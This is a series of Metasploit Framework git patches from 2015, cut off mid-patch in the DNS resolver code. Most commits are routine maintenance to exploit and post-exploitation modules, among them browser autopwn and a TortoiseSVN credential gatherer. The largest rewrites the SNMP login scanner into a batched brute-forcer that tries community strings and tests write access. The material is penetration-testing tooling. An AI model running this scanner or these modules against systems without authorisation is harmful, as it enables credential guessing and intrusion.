@@ -762,8 +762,12 @@ module Msf
         end
       elsif exploit_list.empty?
         print_status("No suitable exploits to send.")
-        send_not_found(cli)
-        return ''
+        if datastore['Content'].blank?
+          send_not_found(cli)
+          return ''
+        else
+          return datastore['Content']
+        end
       end
 
 

From 4e058c942eace1a347162e29415e33363d385102 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 21:04:22 -0500
Subject: [PATCH 0336/1013] Fix typo

---
 lib/msf/core/exploit/browserautopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index ec9f74947b..38e90eee0d 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -629,7 +629,7 @@ module Msf
     # Logs a click that includes the suitable exploit list.
     #
     # @param [String] ip The target's IP address.
-    # @param [String] data (Optioal) CSV data that contains the exploit list.
+    # @param [String] data (Optional) CSV data that contains the exploit list.
     # @return [void]
     def log_click(ip, data='')
       report_note(

From 7ca15f1ae13c5e60a6281e7aa30499bda88fa9d1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 21:06:20 -0500
Subject: [PATCH 0337/1013] Update select_payload doc

---
 lib/msf/core/exploit/browserautopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 38e90eee0d..3c2894de04 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -428,7 +428,7 @@ module Msf
     # Returns an appropriate payload that's compatible with the module.
     #
     # @param [Object] m A module that's been initialized.
-    # @return [String] Payload name. Example: 'windows/meterpreter/reverse_tcp'
+    # @return [Array] Payload name. Example: 'windows/meterpreter/reverse_tcp'
     def select_payload(m)
       compatible_payloads = []
 

From ff39e32cc6697fcc6680eb0201b5c42b65795dd5 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 21:06:57 -0500
Subject: [PATCH 0338/1013] Single quote

---
 modules/exploits/multi/browser/autopwn.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 809eba0fb7..afecbfc00c 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
         OptString.new('Content', [false, 'HTML Content', '']),
         OptAddressRange.new('Whitelist', [false, "A range of IPs you're interested in attacking"]),
         OptInt.new('MaxSessions', [false, 'Number of sessions to get', -1]),
-        OptBool.new("RealList", [true, "Show which exploits will actually be served to each client", false])
+        OptBool.new('RealList', [true, "Show which exploits will actually be served to each client", false])
       ] ,self.class)
 
     deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')

From ea33d7060ee1ab9c6b7bdc9da2871668f5dbaec1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 21:07:27 -0500
Subject: [PATCH 0339/1013] Correct ranking

---
 .../exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb   | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index 6c56be6d95..b040cd0391 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 

From 4b6dcbb9d9edc040c7ce86683c6245a152a94324 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 5 Jun 2015 22:03:56 -0500
Subject: [PATCH 0340/1013] remove junk method

---
 lib/msf/core/exploit/browserautopwnv2.rb | 5 -----
 1 file changed, 5 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 3c2894de04..866e78d6e1 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -132,11 +132,6 @@ module Msf
     end
 
 
-    def stop_bap_job
-      $stderr.puts self.inspect
-    end
-
-
     # Cleans up everything such as notes and jobs.
     #
     # @see #rm_exploit_jobs The method for cleaning up jobs.

From 6b05302059be13eb7a7f214d6e998f2c76a6406a Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 6 Jun 2015 00:50:55 -0500
Subject: [PATCH 0341/1013] Fixes #5459, refactors LoginScanner::SNMP

---
 .../framework/login_scanner/snmp.rb           | 358 ++++++++++++++----
 modules/auxiliary/scanner/snmp/snmp_login.rb  |  10 +-
 .../framework/login_scanner/snmp_spec.rb      |  24 --
 3 files changed, 280 insertions(+), 112 deletions(-)

diff --git a/lib/metasploit/framework/login_scanner/snmp.rb b/lib/metasploit/framework/login_scanner/snmp.rb
index 383caf52ca..5160f3747c 100644
--- a/lib/metasploit/framework/login_scanner/snmp.rb
+++ b/lib/metasploit/framework/login_scanner/snmp.rb
@@ -1,3 +1,5 @@
+# -*- coding: binary -*-
+
 require 'snmp'
 require 'metasploit/framework/login_scanner/base'
 
@@ -13,27 +15,24 @@ module Metasploit
 
         DEFAULT_TIMEOUT      = 2
         DEFAULT_PORT         = 161
-        DEFAULT_RETRIES      = 0
-        DEFAULT_VERSION      = 'all'
+        DEFAULT_VERSION      = '1'
+        DEFAULT_QUEUE_SIZE   = 100
         LIKELY_PORTS         = [ 161, 162 ]
         LIKELY_SERVICE_NAMES = [ 'snmp' ]
         PRIVATE_TYPES        = [ :password ]
         REALM_KEY            = nil
 
-        # The number of retries per community string
-        # @return [Fixnum]
-        attr_accessor :retries
+        attr_accessor :queued_credentials #:nodoc:
+        attr_accessor :queued_results #:nodoc:
+        attr_accessor :sock #:nodoc:
 
         # The SNMP version to scan
         # @return [String]
         attr_accessor :version
 
-        validates :retries,
-                  presence: true,
-                  numericality: {
-                    only_integer: true,
-                    greater_than_or_equal_to: 0
-                  }
+        # The number of logins to try in each batch
+        # @return [Fixnum]
+        attr_accessor :queue_size
 
         validates :version,
                   presence: true,
@@ -41,6 +40,13 @@ module Metasploit
                     in: ['1', '2c', 'all']
                   }
 
+        validates :queue_size,
+                  presence: true,
+                  numericality: {
+                    only_integer: true,
+                    greater_than_or_equal_to: 0
+                  }
+
         # This method returns an array of versions to scan
         # @return [Array] An array of versions
         def versions
@@ -54,94 +60,284 @@ module Metasploit
           end
         end
 
-        # This method attempts a single login with a single credential against the target
-        # @param credential [Credential] The credential object to attmpt to login with
-        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
-        def attempt_login(credential)
-          result_options = {
-              credential: credential,
+        # Attempt to login with every {Credential credential} in # {#cred_details}.
+        #
+        # @yieldparam result [Result] The {Result} object for each attempt
+        # @yieldreturn [void]
+        # @return [void]
+        def scan!
+          valid!
+
+          # Keep track of connection errors.
+          # If we encounter too many, we will stop.
+          consecutive_error_count = 0
+          total_error_count = 0
+
+          successful_users = Set.new
+          first_attempt = true
+
+          # Create a socket for the initial login tests (read-only)
+          configure_socket
+
+          # Create a map of community name to credential object
+          credential_map = {}
+
+          begin
+            each_credential do |credential|
+              # Track the credentials by community string
+              credential_map[credential.public] = credential
+
+              # Skip users for whom we've have already found a password
+              if successful_users.include?(credential.public)
+                # For Pro bruteforce Reuse and Guess we need to note that we
+                # skipped an attempt.
+                if credential.parent.respond_to?(:skipped)
+                  credential.parent.skipped = true
+                  credential.parent.save!
+                end
+                next
+              end
+              # Queue and trigger authentication if queue size is reached
+              versions.each do |version|
+                process_logins(community: credential.public, type: 'read', version: version)
+              end
+
+              # Exit early if we already have a positive result
+              if stop_on_success && self.queued_results.length > 0
+                break
+              end
+            end
+          rescue Errno::ECONNREFUSED
+            # Exit early if we get an ICMP port unreachable
+            return
+          end
+
+          # Handle any unprocessed responses
+          process_logins(final: true)
+
+          # Create a non-duplicated set of credentials
+          found_credentials = self.queued_results.uniq
+
+          # Reset the queued results for our write test
+          self.queued_results = []
+
+          # Grab a new socket to avoid stale replies
+          configure_socket
+
+          # Try to write back the originally received values
+          found_credentials.each do |result|
+             process_logins(
+              version: result[:snmp_version],
+              community: result[:community],
+              type: 'write',
+              data: result[:proof]
+            )
+          end
+
+          # Catch any stragglers
+          process_logins(final: true)
+
+          # Mark any results from our write scan as read-write in our found credentials
+          self.queued_results.select{|r| [0,17].include? r[:snmp_error] }.map{|r| r[:community]}.uniq.each do |c|
+            found_credentials.select{|r| r[:community] == c}.each do |result|
+              result[:access_level] = 'read-write'
+            end
+          end
+
+          # Iterate the results
+          found_credentials.each do |result_options|
+            # Scrub the SNMP version & error code from the tracked result
+            result_options.delete(:snmp_version)
+            result_options.delete(:snmp_error)
+
+            # Associate the community with the original credential
+            result_options[:credential] = credential_map[result_options.delete(:community)]
+
+            # Create, freeze, and yield the result
+            result = ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+            result.freeze
+            yield result if block_given?
+          end
+
+          shutdown_socket
+          nil
+        end
+
+        # Queue up and possibly send any requests, based on the queue limit and final flag
+        def process_logins(opts={})
+          self.queued_results     ||= []
+          self.queued_credentials ||= []
+
+          unless opts[:final] || self.queued_credentials.length > self.queue_size
+            self.queued_credentials.push [ opts[:type], opts[:community], opts[:version], opts[:data] ]
+            return
+          end
+
+          return if self.queued_credentials.length == 0
+
+          process_responses(0.01)
+
+          while self.queued_credentials.length > 0
+            action, community, version, data = self.queued_credentials.pop
+            case action
+            when 'read'
+              send_snmp_read_request(version, community)
+            when 'write'
+              send_snmp_write_request(version, community, data)
+            end
+            sleep_between_attempts
+          end
+          process_responses(1.0)
+        end
+
+        # Process any responses on the UDP socket and queue the results
+        def process_responses(timeout=1.0)
+          queue = []
+          while (res = sock.recvfrom(65535, timeout))
+
+            # Ignore invalid responses
+            break if not res[1]
+
+            # Ignore empty responses
+            next if not (res[0] and res[0].length > 0)
+
+            # Trim the IPv6-compat prefix off if needed
+            shost = res[1].sub(/^::ffff:/, '')
+
+            response = parse_snmp_response(res[0])
+            next unless response
+
+            self.queued_results << {
+              community: response[:community],
               host: host,
               port: port,
               protocol: 'udp',
-              service_name: 'snmp'
-          }
-
-          versions.each do |version|
-            snmp_client = ::SNMP::Manager.new(
-                :Host      => host,
-                :Port      => port,
-                :Community => credential.public,
-                :Version => version,
-                :Timeout => connection_timeout,
-                :Retries => retries,
-                :Transport => ::SNMP::RexUDPTransport,
-                :Socket => ::Rex::Socket::Udp.create('Context' => { 'Msf' => framework, 'MsfExploit' => framework_module })
-            )
-
-            result_options[:proof] = test_read_access(snmp_client)
-            if result_options[:proof].nil?
-              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
-            else
-              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
-              if has_write_access?(snmp_client, result_options[:proof])
-                result_options[:access_level] = "read-write"
-              else
-                result_options[:access_level] = "read-only"
-              end
-            end
+              service_name: 'snmp',
+              proof: response[:proof],
+              status: Metasploit::Model::Login::Status::SUCCESSFUL,
+              access_level: 'read-only',
+              snmp_version: response[:version],
+              snmp_error: response[:error]
+            }
           end
-
-          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
         end
 
-        private
+        # Create and send a SNMP read request for sys.sysDescr.0
+        def send_snmp_read_request(version, community)
+          send_snmp_request(
+            create_snmp_read_sys_descr_request(version, community)
+          )
+        end
+
+        # Create and send a SNMP write request for sys.sysDescr.0
+        def send_snmp_write_request(version, community, data)
+          send_snmp_request(
+            create_snmp_write_sys_descr_request(version, community, data)
+          )
+        end
+
+        # Send a SNMP request on the existing socket
+        def send_snmp_request(pkt)
+          resend_count = 0
 
-        # This method takes an snmp client and tests whether
-        # it has write access to the remote system. It sets the
-        # the sysDescr oid to the same value we already read.
-        # @param snmp_client [SNMP::Manager] The SNMP client to use
-        # @param value [String] the value to set sysDescr back to
-        # @return [Boolean] Returns true or false for if we have write access
-        def has_write_access?(snmp_client, value)
-          var_bind = ::SNMP::VarBind.new("1.3.6.1.2.1.1.1.0", ::SNMP::OctetString.new(value))
           begin
-            resp = snmp_client.set(var_bind)
-            if resp.error_status == :noError
-              return true
+            sock.sendto(pkt, self.host, self.port, 0)
+          rescue ::Errno::ENOBUFS
+            resend_count += 1
+            if resend_count > MAX_RESEND_COUNT
+              return false
             end
-          rescue RuntimeError
-            return false
+            ::IO.select(nil, nil, nil, 0.25)
+            retry
+          rescue ::Rex::ConnectionError
+            # This fires for host unreachable, net unreachable, and broadcast sends
+            # We can safely ignore all of these for UDP sends
           end
-
         end
 
-        # Sets the connection timeout appropriately for SNMP
-        # if the user did not set it.
+        # Create a SNMP request that tries to read from sys.sysDescr.0
+        def create_snmp_read_sys_descr_request(version_str, community)
+          version = version_str == '1' ? 1 : 2
+          OpenSSL::ASN1::Sequence([
+            OpenSSL::ASN1::Integer(version - 1),
+            OpenSSL::ASN1::OctetString(community),
+            OpenSSL::ASN1::Set.new([
+              OpenSSL::ASN1::Integer(rand(0x80000000)),
+              OpenSSL::ASN1::Integer(0),
+              OpenSSL::ASN1::Integer(0),
+              OpenSSL::ASN1::Sequence([
+                OpenSSL::ASN1::Sequence([
+                  OpenSSL::ASN1.ObjectId("1.3.6.1.2.1.1.1.0"),
+                  OpenSSL::ASN1.Null(nil)
+                ])
+              ]),
+            ], 0, :IMPLICIT)
+          ]).to_der
+        end
+
+        # Create a SNMP request that tries to write to sys.sysDescr.0
+        def create_snmp_write_sys_descr_request(version_str, community, data)
+          version = version_str == '1' ? 1 : 2
+          snmp_write = OpenSSL::ASN1::Sequence([
+            OpenSSL::ASN1::Integer(version - 1),
+            OpenSSL::ASN1::OctetString(community),
+            OpenSSL::ASN1::Set.new([
+              OpenSSL::ASN1::Integer(rand(0x80000000)),
+              OpenSSL::ASN1::Integer(0),
+              OpenSSL::ASN1::Integer(0),
+              OpenSSL::ASN1::Sequence([
+                OpenSSL::ASN1::Sequence([
+                  OpenSSL::ASN1.ObjectId("1.3.6.1.2.1.1.1.0"),
+                  OpenSSL::ASN1::OctetString(data)
+                ])
+              ]),
+            ], 3, :IMPLICIT)
+          ]).to_der
+        end
+
+        # Parse a SNMP reply from a packet and return a response hash or nil
+        def parse_snmp_response(pkt)
+          asn = OpenSSL::ASN1.decode(pkt) rescue nil
+          return if not asn
+
+          snmp_vers  = asn.value[0].value.to_i rescue nil
+          snmp_comm  = asn.value[1].value rescue nil
+          snmp_error = asn.value[2].value[1].value.to_i rescue nil
+          snmp_data  = asn.value[2].value[3].value[0] rescue nil
+          snmp_oid   = snmp_data.value[0].value rescue nil
+          snmp_info  = snmp_data.value[1].value.to_s rescue nil
+
+          return if not (snmp_error and snmp_comm and snmp_data and snmp_oid and snmp_info)
+          snmp_vers = snmp_vers == 0 ? "1" : "2c"
+
+          { error: snmp_error, community: snmp_comm, proof: snmp_info, version: snmp_vers}
+        end
+
+        # Create a new socket for this scanner
+        def configure_socket
+          shutdown_socket if self.sock
+          self.sock = ::Rex::Socket::Udp.create(
+            'PeerHost' => self.host,
+            'PeerPort' => self.port,
+            'Context'  =>
+              { 'Msf' => framework, 'MsfExploit' => framework_module }
+            )
+        end
+
+        # Close any open socket if it exists
+        def shutdown_socket
+          self.sock.close if self.sock
+          self.sock = nil
+        end
+
+        # Sets the SNMP parameters if not specified
         def set_sane_defaults
           self.connection_timeout = DEFAULT_TIMEOUT if self.connection_timeout.nil?
           self.port = DEFAULT_PORT if self.port.nil?
-          self.retries = DEFAULT_RETRIES if self.retries.nil?
           self.version = DEFAULT_VERSION if self.version.nil?
+          self.queue_size = DEFAULT_QUEUE_SIZE if self.queue_size.nil?
         end
 
-        # This method takes an snmp client and tests whether
-        # it has read access to the remote system. It checks
-        # the sysDescr oid to use as proof
-        # @param snmp_client [SNMP::Manager] The SNMP client to use
-        # @return [String, nil] Returns a string if successful, nil if failed
-        def test_read_access(snmp_client)
-          proof = nil
-          begin
-            resp = snmp_client.get("sysDescr.0")
-            resp.each_varbind { |var| proof = var.value }
-          rescue RuntimeError
-            proof = nil
-          end
-          proof
-        end
-
-
-
       end
 
     end
diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb
index ec3cd19571..980c437f15 100644
--- a/modules/auxiliary/scanner/snmp/snmp_login.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_login.rb
@@ -29,10 +29,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
     [
       Opt::RPORT(161),
-      Opt::CHOST,
-      OptInt.new('CONNECTION_TIMEOUT', [true, 'The timeout value for each probe', 2]),
-      OptInt.new('RETRIES', [true, 'The number of retries per community string', 0]),
-      OptEnum.new('VERSION', [true, 'The SNMP version to scan', 'all', ['1', '2c', 'all']]),
+      OptEnum.new('VERSION', [true, 'The SNMP version to scan', '1', ['1', '2c', 'all']]),
       OptString.new('PASSWORD', [ false, 'The password to test' ]),
       OptPath.new('PASS_FILE',  [ false, "File containing communities, one per line",
         File.join(Msf::Config.data_directory, "wordlists", "snmp_default_pass.txt")
@@ -56,11 +53,10 @@ class Metasploit3 < Msf::Auxiliary
         cred_details: collection,
         stop_on_success: datastore['STOP_ON_SUCCESS'],
         bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
-        connection_timeout: datastore['CONNECTION_TIMEOUT'],
-        retries: datastore['RETRIES'],
         version: datastore['VERSION'],
         framework: framework,
-        framework_module: self
+        framework_module: self,
+        queue_size: 100
     )
 
     scanner.scan! do |result|
diff --git a/spec/lib/metasploit/framework/login_scanner/snmp_spec.rb b/spec/lib/metasploit/framework/login_scanner/snmp_spec.rb
index 0dc0c8851c..99ccfbdca5 100644
--- a/spec/lib/metasploit/framework/login_scanner/snmp_spec.rb
+++ b/spec/lib/metasploit/framework/login_scanner/snmp_spec.rb
@@ -29,28 +29,4 @@ describe Metasploit::Framework::LoginScanner::SNMP do
     described_class.new
   }
 
-  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: false, has_default_realm: false
-
-
-  context '#attempt_login' do
-    before(:each) do
-      snmp_scanner.host = '127.0.0.1'
-      snmp_scanner.port = 161
-      snmp_scanner.connection_timeout = 1
-      snmp_scanner.stop_on_success = true
-      snmp_scanner.cred_details = detail_group
-    end
-
-    it 'creates a Timeout based on the connection_timeout' do
-      ::Timeout.should_receive(:timeout).at_least(:once).with(snmp_scanner.connection_timeout)
-      snmp_scanner.attempt_login(pub_comm)
-    end
-
-    it 'creates a SNMP Manager for each supported version of SNMP' do
-      ::SNMP::Manager.should_receive(:new).twice.and_call_original
-      snmp_scanner.attempt_login(pub_comm)
-    end
-
-  end
-
 end

From 135958a225a6b0631becc14106568de6f291301d Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 6 Jun 2015 00:54:08 -0500
Subject: [PATCH 0342/1013] Cleanup the udp_(sweep|probe) SNMP generators

---
 .../auxiliary/scanner/discovery/udp_probe.rb  | 58 ++++++++++---------
 .../auxiliary/scanner/discovery/udp_sweep.rb  | 58 ++++++++++---------
 2 files changed, 64 insertions(+), 52 deletions(-)

diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb
index fb5b0bf10f..152f3c7374 100644
--- a/modules/auxiliary/scanner/discovery/udp_probe.rb
+++ b/modules/auxiliary/scanner/discovery/udp_probe.rb
@@ -473,36 +473,42 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def probe_pkt_snmp1(ip)
-    name = 'public'
-    xid = rand(0x100000000)
-    pdu =
-      "\x02\x01\x00" +
-      "\x04" + [name.length].pack('c') + name +
-      "\xa0\x1c" +
-      "\x02\x04" + [xid].pack('N') +
-      "\x02\x01\x00" +
-      "\x02\x01\x00" +
-      "\x30\x0e\x30\x0c\x06\x08\x2b\x06\x01\x02\x01" +
-      "\x01\x01\x00\x05\x00"
-    head = "\x30" + [pdu.length].pack('C')
-    data = head + pdu
+    version = 1
+    data = OpenSSL::ASN1::Sequence([
+      OpenSSL::ASN1::Integer(version - 1),
+      OpenSSL::ASN1::OctetString("public"),
+      OpenSSL::ASN1::Set.new([
+        OpenSSL::ASN1::Integer(rand(0x80000000)),
+        OpenSSL::ASN1::Integer(0),
+        OpenSSL::ASN1::Integer(0),
+        OpenSSL::ASN1::Sequence([
+          OpenSSL::ASN1::Sequence([
+            OpenSSL::ASN1.ObjectId("1.3.6.1.2.1.1.1.0"),
+            OpenSSL::ASN1.Null(nil)
+          ])
+        ]),
+      ], 0, :IMPLICIT)
+    ]).to_der
     [data, 161]
   end
 
   def probe_pkt_snmp2(ip)
-    name = 'public'
-    xid = rand(0x100000000)
-    pdu =
-      "\x02\x01\x01" +
-      "\x04" + [name.length].pack('c') + name +
-      "\xa1\x19" +
-      "\x02\x04" + [xid].pack('N') +
-      "\x02\x01\x00" +
-      "\x02\x01\x00" +
-      "\x30\x0b\x30\x09\x06\x05\x2b\x06\x01\x02\x01" +
-      "\x05\x00"
-    head = "\x30" + [pdu.length].pack('C')
-    data = head + pdu
+    version = 2
+    data = OpenSSL::ASN1::Sequence([
+      OpenSSL::ASN1::Integer(version - 1),
+      OpenSSL::ASN1::OctetString("public"),
+      OpenSSL::ASN1::Set.new([
+        OpenSSL::ASN1::Integer(rand(0x80000000)),
+        OpenSSL::ASN1::Integer(0),
+        OpenSSL::ASN1::Integer(0),
+        OpenSSL::ASN1::Sequence([
+          OpenSSL::ASN1::Sequence([
+            OpenSSL::ASN1.ObjectId("1.3.6.1.2.1.1.1.0"),
+            OpenSSL::ASN1.Null(nil)
+          ])
+        ]),
+      ], 0, :IMPLICIT)
+    ]).to_der
     [data, 161]
   end
 
diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb
index 22959631c9..e8222d1e05 100644
--- a/modules/auxiliary/scanner/discovery/udp_sweep.rb
+++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb
@@ -432,36 +432,42 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def probe_pkt_snmp1(ip)
-    name = 'public'
-    xid = rand(0x100000000)
-    pdu =
-      "\x02\x01\x00" +
-      "\x04" + [name.length].pack('c') + name +
-      "\xa0\x1c" +
-      "\x02\x04" + [xid].pack('N') +
-      "\x02\x01\x00" +
-      "\x02\x01\x00" +
-      "\x30\x0e\x30\x0c\x06\x08\x2b\x06\x01\x02\x01" +
-      "\x01\x01\x00\x05\x00"
-    head = "\x30" + [pdu.length].pack('C')
-    data = head + pdu
+    version = 1
+    data = OpenSSL::ASN1::Sequence([
+      OpenSSL::ASN1::Integer(version - 1),
+      OpenSSL::ASN1::OctetString("public"),
+      OpenSSL::ASN1::Set.new([
+        OpenSSL::ASN1::Integer(rand(0x80000000)),
+        OpenSSL::ASN1::Integer(0),
+        OpenSSL::ASN1::Integer(0),
+        OpenSSL::ASN1::Sequence([
+          OpenSSL::ASN1::Sequence([
+            OpenSSL::ASN1.ObjectId("1.3.6.1.2.1.1.1.0"),
+            OpenSSL::ASN1.Null(nil)
+          ])
+        ]),
+      ], 0, :IMPLICIT)
+    ]).to_der
     [data, 161]
   end
 
   def probe_pkt_snmp2(ip)
-    name = 'public'
-    xid = rand(0x100000000)
-    pdu =
-      "\x02\x01\x01" +
-      "\x04" + [name.length].pack('c') + name +
-      "\xa1\x19" +
-      "\x02\x04" + [xid].pack('N') +
-      "\x02\x01\x00" +
-      "\x02\x01\x00" +
-      "\x30\x0b\x30\x09\x06\x05\x2b\x06\x01\x02\x01" +
-      "\x05\x00"
-    head = "\x30" + [pdu.length].pack('C')
-    data = head + pdu
+    version = 2
+    data = OpenSSL::ASN1::Sequence([
+      OpenSSL::ASN1::Integer(version - 1),
+      OpenSSL::ASN1::OctetString("public"),
+      OpenSSL::ASN1::Set.new([
+        OpenSSL::ASN1::Integer(rand(0x80000000)),
+        OpenSSL::ASN1::Integer(0),
+        OpenSSL::ASN1::Integer(0),
+        OpenSSL::ASN1::Sequence([
+          OpenSSL::ASN1::Sequence([
+            OpenSSL::ASN1.ObjectId("1.3.6.1.2.1.1.1.0"),
+            OpenSSL::ASN1.Null(nil)
+          ])
+        ]),
+      ], 0, :IMPLICIT)
+    ]).to_der
     [data, 161]
   end
 

From bf35b9bdf4239ea8ee6615223e2bc2648005ee1c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 6 Jun 2015 01:35:09 -0500
Subject: [PATCH 0343/1013] Minor fix

---
 modules/post/windows/gather/credentials/tortoisesvn.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb
index 303f42695b..731d3da103 100644
--- a/modules/post/windows/gather/credentials/tortoisesvn.rb
+++ b/modules/post/windows/gather/credentials/tortoisesvn.rb
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Post
     end
 
     report_cred(
-      host: ::Rex::Socket.resolv(http_proxy_host), # TODO: Fix up report_host?
+      ip: ::Rex::Socket.resolv(http_proxy_host), # TODO: Fix up report_host?
       port: http_proxy_port,
       service_name: 'http',
       user: http_proxy_username,
@@ -232,8 +232,8 @@ class Metasploit3 < Msf::Post
     else
       print_status("Searching for TortoiseSVN...")
       prepare_railgun
-      get_config_files()
-      get_proxy_data()
+      get_config_files
+      get_proxy_data
     end
 
     print_status("Complete")

From cec20ec5d917ab767b57231d18e8c10d349b0020 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 6 Jun 2015 11:46:19 -0500
Subject: [PATCH 0344/1013] Handle a rare corner case

---
 lib/metasploit/framework/login_scanner/snmp.rb | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/metasploit/framework/login_scanner/snmp.rb b/lib/metasploit/framework/login_scanner/snmp.rb
index 5160f3747c..afeb5267de 100644
--- a/lib/metasploit/framework/login_scanner/snmp.rb
+++ b/lib/metasploit/framework/login_scanner/snmp.rb
@@ -153,6 +153,9 @@ module Metasploit
             # Associate the community with the original credential
             result_options[:credential] = credential_map[result_options.delete(:community)]
 
+            # In the rare chance that we got a result for a community we didn't scan...
+            next unless result_options[:credential]
+
             # Create, freeze, and yield the result
             result = ::Metasploit::Framework::LoginScanner::Result.new(result_options)
             result.freeze

From c80017992adb1886a8c2f0009bf775df144a9c8a Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 6 Jun 2015 13:48:52 -0500
Subject: [PATCH 0345/1013] A dirty patch for a number of Net::DNS/dns_enum
 issues

---
 lib/net/dns/resolver.rb              | 108 ++++++++++++-----------
 lib/net/dns/rr.rb                    | 125 ++++++++++++++-------------
 modules/auxiliary/gather/enum_dns.rb |  84 +++---------------
 3 files changed, 136 insertions(+), 181 deletions(-)

diff --git a/lib/net/dns/resolver.rb b/lib/net/dns/resolver.rb
index 036d31dd8f..b593441f2d 100644
--- a/lib/net/dns/resolver.rb
+++ b/lib/net/dns/resolver.rb
@@ -87,6 +87,9 @@ module Net # :nodoc:
     #
     class Resolver
 
+      class NextNameserver < RuntimeError
+      end
+
       # An hash with the defaults values of almost all the
       # configuration parameters of a resolver object. See
       # the description for each parameter to have an
@@ -109,7 +112,7 @@ module Net # :nodoc:
         :ignore_truncated => false,
         :packet_size => 512,
         :tcp_timeout => TcpTimeout.new(120),
-        :udp_timeout => UdpTimeout.new(0)}
+        :udp_timeout => UdpTimeout.new(5)}
 
       # Create a new resolver object.
       #
@@ -887,8 +890,11 @@ module Net # :nodoc:
         end
 
         @logger.debug "Query(#{name},#{Net::DNS::RR::Types.new(type)},#{Net::DNS::RR::Classes.new(cls)})"
-
-        send(name,type,cls)
+        begin
+          send(name,type,cls)
+        rescue ::NoResponseError
+          return
+        end
 
       end
 
@@ -1011,13 +1017,13 @@ module Net # :nodoc:
         packet_data = packet.data
         packet_size = packet_data.size
 
-    if @raw
-      @logger.warn "AXFR query, switching to TCP over RAW socket"
-      method = :send_raw_tcp
-    else
-      @logger.warn "AXFR query, switching to TCP"
-      method = :send_tcp
-    end
+        if @raw
+          @logger.warn "AXFR query, switching to TCP over RAW socket"
+          method = :send_raw_tcp
+        else
+          @logger.warn "AXFR query, switching to TCP"
+          method = :send_tcp
+        end
 
         answers = []
         soa = 0
@@ -1026,7 +1032,7 @@ module Net # :nodoc:
 
           begin
             response = Net::DNS::Packet.parse(ans[0],ans[1])
-            if response.answer[0].type == "SOA"
+            if response && response.answer && response.answer[0] && response.answer[0].type == "SOA"
               soa += 1
               if soa >= 2
                 break
@@ -1167,50 +1173,54 @@ module Net # :nodoc:
             sockaddr = Socket.pack_sockaddr_in(@config[:port],ns.to_s)
 
             @config[:tcp_timeout].timeout do
-              catch "next nameserver" do
-                socket.connect(sockaddr)
-                @logger.info "Contacting nameserver #{ns} port #{@config[:port]}"
-                socket.write(length+packet_data)
-                got_something = false
-                loop do
-                  buffer = ""
